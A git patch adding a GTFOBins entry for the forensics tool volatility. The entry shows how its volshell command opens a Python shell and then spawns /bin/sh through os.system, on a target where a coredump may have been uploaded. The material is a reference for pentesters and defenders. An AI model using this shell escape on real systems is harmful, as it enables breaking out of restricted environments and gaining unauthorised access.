From c056acd2e225bce6daeb71437dab7ec5743a8bfd Mon Sep 17 00:00:00 2001 From: Lemon <74184683+kitty14956590@users.noreply.github.com> Date: Sat, 19 Feb 2022 08:33:17 -0500 Subject: [PATCH] Add volatility Co-authored-by: Andrea Cardaci --- _gtfobins/volatility.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 _gtfobins/volatility.md diff --git a/_gtfobins/volatility.md b/_gtfobins/volatility.md new file mode 100644 index 0000000..16b7f07 --- /dev/null +++ b/_gtfobins/volatility.md @@ -0,0 +1,8 @@ +--- +description: This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply. +functions: + shell: + - code: | + volatility -f file.dump volshell + __import__('os').system('/bin/sh') +---